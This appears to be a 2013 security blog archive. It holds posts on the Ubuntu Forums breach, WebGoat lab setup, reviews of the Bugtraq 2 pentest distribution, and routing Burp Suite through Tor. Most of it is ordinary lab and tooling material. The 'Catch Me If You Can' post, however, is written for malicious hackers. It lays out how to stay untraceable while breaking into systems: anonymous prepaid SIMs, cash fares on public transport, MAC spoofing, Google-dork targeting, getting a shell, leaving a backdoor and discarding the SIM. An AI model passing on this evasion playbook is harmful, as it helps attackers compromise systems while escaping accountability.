The login method has been changed to Ubuntu One SSO. That seems fine. But what if the Ubuntu One SSO login logic has a vulnerability? Or the attack did not come through the login at all?

They limited HTML in the forums, which seems good. However, a skilled attacker can bypass such filters very easily. What if the attacker injects JavaScript?

If the forums still have a vulnerability, the attacker can go after the forum admin or moderator accounts directly without escalating from any other account.

Implementing AppArmor is a good idea. However, the forums can still be defaced if the attacker gains the necessary rights, as AppArmor will not block that kind of activity. The attacker can also reach the database servers, even remotely.

Altering the PHP config file and enhancing the firewall will not improve things much. The firewall handles the network layer, while the attack targets Layer 7, the application layer. Meanwhile, PHP config hardening will not prevent an attacker from gaining access to the web application.

In my opinion, the forum admins should consider a penetration test of vBulletin, although there is no exploit for vBulletin 4.2.1 in the wild so far. However, who knows whether there are unknown exploits for vBulletin 4.2.1?

As far as I know, most forum admins still have an old-school security mindset. They need to learn more, and learn new things. Otherwise the next attack is waiting. Clients (customers) are always the losers in a cyber attack.

That's all! See you.

Catch Me If You Can

As a malicious hacker, you are required to hide yourself before attacking. If you fail to do so, you will be caught. Most malicious hackers hide themselves by using botnets, Tor or proxies, or similar. However, I would like to introduce a new way to hide yourself when doing evil things on the internet.

In our country, you are not required to register your personal particulars to purchase a 3G/4G pre-paid SIM card. In other countries, you may be required to do so.

In the early morning, you can board public transportation, such as a bus, and pay with a non-traceable payment method, such as cash. Open your laptop and plug in your 3G/4G mobile dongle. You are using a pre-paid SIM card, you are on moving public transportation, and you paid with a non-traceable payment method. You fake your MAC address with macchanger.

You search for a target on Google with dorks. Once you find a target, you can go ahead and attack it without worrying about hiding yourself. After several commands are issued, you get a shell and have compromised the target. You leave a backdoor for further access.

After that, make sure to drop the pre-paid SIM card in a rubbish bin outside your living area after your successful attack.

Next time, take another public transportation route to access the compromised target or to seek another target with another pre-paid SIM card.

Now, you are fully untraceable.

That's all! See you.

See Also

Catch Me If You Can 2
Catch Me If You Can 3
Catch Me If You Can 4

NATO Review - Cyber Attacks

The following are the recent NATO Review items on cyber attacks.

Cyber attacks : How can they hurt us?

Cyberwar - does it exist?

Cyber Attacks and Angry Birds

Hackers for hire



That's all! See you.

Saturday, July 27, 2013

HOWTO : WebGoat 5.4 on Ubuntu Server 12.04 LTS

Step 1 :

Install Ubuntu Server 12.04 LTS as usual. Select OpenSSH server and Tomcat Server at the end of the installer.

Step 2 :

Download WebGoat 5.4.

wget http://webgoat.googlecode.com/files/WebGoat-5.4.war

Step 3 :

Rename the WAR file to WebGoat.war and copy it to the Tomcat webapps directory.

mv WebGoat-5.4.war WebGoat.war
sudo cp WebGoat.war /var/lib/tomcat6/webapps/


Step 4 :

Edit tomcat-users.xml to add the roles and users WebGoat 5.4 expects.

sudo nano /etc/tomcat6/tomcat-users.xml

Insert the following before the </tomcat-users> tag :

<role rolename="webgoat_basic"/>
<role rolename="webgoat_admin"/>
<role rolename="webgoat_user"/>
<role rolename="tomcat"/>
<user password="webgoat" roles="webgoat_admin" username="webgoat"/>
<user password="basic" roles="webgoat_user,webgoat_basic" username="basic"/>
<user password="tomcat" roles="tomcat" username="tomcat"/>
<user password="guest" roles="webgoat_user" username="guest"/>


Step 5 :

Restart Tomcat.

sudo /etc/init.d/tomcat6 restart

Step 6 :

Open a browser (e.g. Firefox) and point it to the address of the WebGoat server (e.g. 192.168.56.102).

http://192.168.56.102:8080/WebGoat/attack

Enter "guest" as both the username and the password.
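As an added example (not part of the original post), the following script audits a tomcat-users.xml before a WebGoat host goes live: it checks that the four roles above are declared, that every user references only declared roles, and it flags accounts whose password equals their username, which is the case for all of the lab defaults shown above and is only acceptable on an isolated lab network. The sample XML embedded in the script is a constructed copy of the fragment above.

```python
import xml.etree.ElementTree as ET

# Roles declared in the tomcat-users.xml fragment for WebGoat 5.4.
WEBGOAT_ROLES = {"webgoat_basic", "webgoat_admin", "webgoat_user", "tomcat"}

# Constructed sample mirroring the fragment inserted above.
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<tomcat-users>
  <role rolename="webgoat_basic"/>
  <role rolename="webgoat_admin"/>
  <role rolename="webgoat_user"/>
  <role rolename="tomcat"/>
  <user password="webgoat" roles="webgoat_admin" username="webgoat"/>
  <user password="basic" roles="webgoat_user,webgoat_basic" username="basic"/>
  <user password="tomcat" roles="tomcat" username="tomcat"/>
  <user password="guest" roles="webgoat_user" username="guest"/>
</tomcat-users>
"""


def _local(tag):
    # Tomcat 7+ files carry an xmlns; compare on the local tag name only.
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return missing WebGoat roles, undeclared role references per user,
    and the users whose password equals their username."""
    root = ET.fromstring(xml_text)
    elems = list(root.iter())
    declared = {e.get("rolename") for e in elems if _local(e.tag) == "role"}
    undeclared, weak = {}, []
    for e in elems:
        if _local(e.tag) != "user":
            continue
        name = e.get("username") or e.get("name")  # both spellings occur
        refs = {r.strip() for r in e.get("roles", "").split(",") if r.strip()}
        if refs - declared:
            undeclared[name] = sorted(refs - declared)
        if e.get("password") == name:
            weak.append(name)
    return {"missing_roles": sorted(WEBGOAT_ROLES - declared),
            "undeclared_roles": undeclared,
            "password_equals_username": weak}


if __name__ == "__main__":
    print(audit_tomcat_users(SAMPLE_XML))
```

Run it against the real file with `audit_tomcat_users(open("/etc/tomcat6/tomcat-users.xml").read())`; a non-empty "password_equals_username" list means the defaults are still in place.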

Tutorial

OWASP WebGoat v5.4 Web Hacking Simulation WalkThrough Series

That's all! See you.

Sunday, July 21, 2013

Ubuntu Forums has been pwned!

According to the Ubuntu Forums, the forums were defaced at 2011 hours on July 20, 2013 (UTC). The defacement page is the same as this one and the source code of the page is here. It also plays music.

Ubuntu Forums also stated that the website's database was downloaded by the attacker, and the attacker confirmed this. However, the attacker stated that s/he will not leak the database to the public or take advantage of it.

The Ubuntu Forums use the vBulletin PHP software. The forums were updated or upgraded early this year. According to Exploit Database, the latest exploit is dated March 25, 2013 (not counting the exploit from July 2013, as the forums were already updated/upgraded by then). If the update/upgrade included these bug fixes, there would be no known exploit for vBulletin in the wild.

However, the forums looked for PHP developers to assist in implementing OpenID for the forums update/upgrade on January 23, 2012 (please see here).

If the customized vBulletin did not have an audit or penetration test, it may contain bugs or vulnerabilities. The custom changes to vBulletin may have led to the attack's success.

I think that the attack technique in this case is SQL Injection.

The forums are still down at the time of this writing (July 21, 2013 1340 UTC).

Remark : please refer to this link for my information gathering.

That's all! See you.

UPDATE : Part 2

Friday, July 19, 2013

Coming Soon : Bugtroid

Bugtraq for Android is coming soon. It does not run on virtualization technology.



That's all! See you.

HOWTO : Update Vega on Bugtraq 2 Black Widow

When you run Vega Webscanner, you will see a pop-up for the update. I am going to show you how to update it yourself instead of via the official Hammer System Manager of Bugtraq 2.

Keep in mind that you are not required to use "sudo".

Download the latest version - 1.0 build 96.

32-bit :

wget http://subgraph.com/downloads/VegaBuild-linux.gtk.x86.zip

64-bit :

wget http://subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip

Extract the zip file :

unzip VegaBuild-linux.gtk.x86.zip

or

unzip VegaBuild-linux.gtk.x86_64.zip

Backup the current Vega :

mv /bugtraq/tools/web_audit/web_analisys/vega /bugtraq/tools/web_audit/web_analisys/vega-bak

Copy the extracted directory to the destination :

cp -R vega/ /bugtraq/tools/web_audit/web_analisys/

That's all! See you.

Thursday, July 18, 2013

Bug Fix : Bugtraq 2 XFce 64-bit with Parallels Tools on Mac OS X 10.8.4

You need to do the following in the guest (Bugtraq 2 XFce 64-bit) on Parallels 8 before installing the Parallels Tools.

sudo ln -s /usr/lib/insserv/insserv /sbin/insserv

Otherwise, the Parallels Tools cannot be installed properly.

That's all! See you.

Tuesday, July 16, 2013

REVIEW : Bugtraq 2 Black Widow Final

Bugtraq 2 Black Widow Final is built on Ubuntu, Debian and OpenSuse. Each distribution comes with the XFce, Gnome and KDE window managers, in both 32-bit and 64-bit. That is a total of 18 copies that the Bugtraq Team needs to maintain.

Bugtraq 2 Black Widow pre-installs and configures some useful penetration testing tools that other pentesting Linux distributions lack. It also includes smartphone pentesting tools. It would be sweet if Bugtraq 2 could pre-install Immunity Debugger and edb-debugger as well as T50 and mona.py.

The Conky displays a lot of useful information on the screen that most hackers will find useful. However, the Conky script is designed for 4 cores (or 2 cores with Hyper-threading). If you have 2 cores, you need to change /bugtraq/scripts/conky/conky-app.sh : replace "conky -c /bugtraq/scripts/conky/.conkyrc &" with "conky -c /bugtraq/scripts/conky/.conkyrc2 &". Otherwise, Conky will not load.

Bugtraq 2 also lacks documentation, like the others. However, you can find a lot of demo videos at its official site. There are some interesting demo videos, such as botnet setting.

Bugtraq 2 works well in virtual machines, such as VirtualBox and Parallels (Mac OS X). I tested it on a Lenovo ThinkPad X201s and found no problem with the Ubuntu XFce and Gnome versions.

The Bugtraq Team comes from Spain and Bugtraq 2 Black Widow defaults to the Spanish language and Spanish keyboard layout. When you install Bugtraq 2 Black Widow, you need to set the language to English and the keyboard layout to "English (US)" or your country's setting. The default username is "bugtraq" and the password is "123456". Make sure you change your password after install.

I tested the Ubuntu Gnome and XFce copies and found that the XFce version has fewer bugs. I think the team develops on Ubuntu XFce and then builds the others based on it. Therefore, I suggest you download the Ubuntu XFce version.

Bugtraq 2 Black Widow comes with a Services Administrator GUI and a Databases GUI as well as a Conky Manager. However, there are some bugs in those programs. The two GUIs are situated at "Applications -- System Services".

I prepared an auto-run script to fix the bugs in those programs and you can download it here. It works well on the 32-bit and 64-bit Ubuntu Gnome and XFce versions. Others are not tested, but it may work.

The bugfix script is intended to fix the bugs in Sagui and DBgui. However, it also fixes some minor bugs in Conky. Keep in mind that the official Conky is written for a wireless device (wlan0), and my bugfix script is also written for wlan0. If you are using an Ethernet device, you need to change "wlan0" to "eth0" (or whichever device fits) in the "+.conkyrc" and "proxys.conf" scripts in the "bugtraq-2-gnome-x32-bugfix" directory. Make sure you change it before running the bugfix script. In addition, the script will install some missing packages too.

Extract it with the following command :

tar -xvzf bugtraq-2-gnome-x32-bugfix.tar.gz

To run it :

cd bugtraq-2-gnome-x32-bugfix
./auto-bugfix.sh


In addition, there are some bugs in Hammer System Manager that require the team to fix them.

After the install, you need to update your box. You can do that with the following commands, or you can build a script for that too.

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get --purge autoclean
sudo apt-get --purge autoremove


Conclusion

Highly recommended. Bugtraq 2 Black Widow will give you a new user experience. You will love it. Believe me!

UPDATE

The auto-run script has been updated with a minor bug fix for the Conky script; you can download it here.



That's all! See you.

Monday, July 15, 2013

Bug Fix : Bugtraq 2 Black Widow Final (Gnome)

Bugtraq 2 Black Widow Final is built on Ubuntu, Debian and OpenSuse. Each distribution comes with the XFce, Gnome and KDE window managers, in both 32-bit and 64-bit. That is a total of 18 copies that the Bugtraq Team needs to maintain.

I downloaded the Ubuntu Gnome 32-bit and 64-bit versions as I like Gnome Classic very much. After boot-up, you need to set "Session" to "Gnome Classic" from the login screen of the Live DVD. The username is "bugtraq" and the password is "123456". The installation program is situated at "Applications -- System Tools -- Administration -- Install RELEASE" on the 32-bit version. The installation program for 64-bit is on the Desktop.

The installation on my Parallels (Mac OS X virtualization program) was smooth. I suggest you choose to download the updates and 3rd-party programs during install. For the first login of the installed copy, you need to set the "Session" to "Gnome Classic" and also make it the default.

Bugtraq 2 comes with a Services Administrator GUI and a Databases GUI as well as Conky. However, there are some bugs in those programs. I am now going to fix them. The two GUIs are situated at "Applications -- System Services".

I prepared an auto-run script to fix the bugs in those programs and you can download it here. It works well on the 32-bit and 64-bit Ubuntu Gnome versions.

The bugfix script is intended to fix the bugs in Sagui and DBgui. However, it also fixes some minor bugs in Conky. Keep in mind that the official Conky is written for a wireless device (wlan0), and my bugfix script is also written for wlan0. If you are using an Ethernet device, you need to change "wlan0" to "eth0" (or whichever device fits) in the "+.conkyrc" and "proxys.conf" scripts in the "bugtraq-2-gnome-x32-bugfix" directory. Make sure you change it before running the bugfix script. In addition, the script will install some missing packages too.

WARNING : This bugfix script may damage your system or computer. You take care of the risk while using it.

Extract it with the following command :

tar -xvzf bugtraq-2-gnome-x32-bugfix.tar.gz

To run it :

cd bugtraq-2-gnome-x32-bugfix
./auto-bugfix.sh


UPDATE

The auto-run script has been updated with a minor bug fix for the Conky script; you can download it here.



That's all! See you.

Friday, July 12, 2013

Friday, July 05, 2013

HOWTO : Burp Suite with Tor on Mac OS X 10.8.4

Step 1 :

Go to the Burp Suite official site to download the free edition.

Then save it to the Documents folder.

Step 2 :

Open a terminal.

nano burpsuite_free.sh

java -jar /Users/samiux/Documents/burpsuite_free_v1.5.jar


Replace "samiux" with your user name, then make the script executable so that it can be run directly in Step 7 :

chmod +x burpsuite_free.sh

Step 3 :

Go to the Java official site to download the Java JRE.

Step 4 :

Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".

Step 5 :

Go to the Privoxy official site to download Privoxy 3.0.21 64 bit.pkg and install it.

Step 6 :

Open a terminal.

nano /usr/local/etc/privoxy/config

Append the following lines (the first sends everything to the Tor SOCKS port of the Tor Browser Bundle; the second sends 192.168.*.* hosts out directly, bypassing Tor) :

forward-socks5 / 127.0.0.1:9150 .
forward 192.168.*.*/ .


Restart the Mac.

Step 7 :

Open a terminal and go to the Documents folder.

./burpsuite_free.sh

Options >> Upstream Proxy Servers >> Add >> Proxy host >> 127.0.0.1
Options >> Upstream Proxy Servers >> Add >> Proxy port >> 8118

Step 8 :

Start "TorBrowser_en-US". The TorBrowser will launch.

TorBrowser >> Preferences >> Advanced >> Connection >> Settings

Select "Manual proxy configuration:".

HTTP Proxy >> 127.0.0.1 >> Port >> 8080
SOCKS Host >> 127.0.0.1 >> Port >> 9150

Step 9 :

Make sure Burp Suite is behind Tor by visiting cmyip.com.

Remarks :

Installing on Ubuntu 12.04 LTS is similar. However, port 9150 will be port 9050 there, since the Ubuntu Tor package listens on 9050 instead of the Tor Browser Bundle's 9150.
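As an added example (not Privoxy's code and not part of the original post), the following script models how the two forward rules from Step 6 route a request, using Privoxy's rule that the last matching forward line wins: every host goes to the Tor SOCKS port except 192.168.*.* addresses, which leave directly. It assumes that shell-style wildcards are enough for the two patterns on this page ("/" and "192.168.*.*"); Privoxy's full pattern syntax is not modelled.

```python
from fnmatch import fnmatchcase

# The lines Step 6 appends to /usr/local/etc/privoxy/config.
PRIVOXY_FORWARDS = """
forward-socks5 / 127.0.0.1:9150 .
forward 192.168.*.*/ .
"""


def parse_forwards(text):
    """Return [(kind, host_pattern, gateway_or_None)] in file order."""
    rules = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].startswith("forward"):
            continue
        kind = parts[0]                       # "forward" or "forward-socks5"
        pattern = parts[1].split("/", 1)[0]   # drop the path part; "/" -> ""
        gateway = None if parts[2] == "." else parts[2]  # "." means direct
        rules.append((kind, pattern, gateway))
    return rules


def route(host, rules):
    """Privoxy semantics: the last forward rule whose pattern matches wins.
    An empty pattern (from "/") matches every host."""
    chosen = ("direct", None)
    for kind, pattern, gateway in rules:
        if pattern == "" or fnmatchcase(host, pattern):
            chosen = ("direct", None) if gateway is None else (kind, gateway)
    return chosen


if __name__ == "__main__":
    rules = parse_forwards(PRIVOXY_FORWARDS)
    for host in ("cmyip.com", "192.168.56.102", "10.0.0.5"):
        print(host, "->", route(host, rules))
```

Note that the bypass is a plain wildcard match, so a lab host such as the WebGoat server at 192.168.56.102 is reached directly while any public host is forced through Tor; a typo in the second line would silently send lab traffic out through Tor or, worse, reverse the intent.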

That's all! See you.